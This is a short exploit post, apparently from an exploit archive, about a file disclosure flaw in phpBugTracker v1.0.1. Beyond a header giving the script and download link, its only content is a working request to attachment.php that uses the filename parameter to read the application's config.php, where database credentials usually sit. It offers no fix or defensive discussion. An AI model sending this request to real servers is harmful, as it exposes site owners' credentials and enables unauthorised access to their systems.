id: 11012
date: 02/22/2010
title: phpBugTracker v1.0.1 File Disclosure Vulnerability
author: ViRuSMaN
cves: 

==================================================
phpBugTracker v1.0.1 File Disclosure Vulnerability
==================================================

==============================================================================
        [»] phpBugTracker v1.0.1 File Disclosure Vulnerability
==============================================================================
 
    [»] Script:             [ phpBugTracker ]
    [»] Language:           [ PHP ]
    [»] Download:           [ http://ftp5.ru.freebsd.org/pub/FreeBSD/distfiles/phpbt-1.0.1.tar.gz ]
    [»] Founder:            [ ViRuSMaN ]
 
###########################################################################
 
===[ Exploit ]===
 
    [»] http://server/[path]/attachment.php?filename=./config.php
 
 
 
 
Author: ViRuSMaN <-
 
###########################################################################



#  0day.today [2023-03-25]  #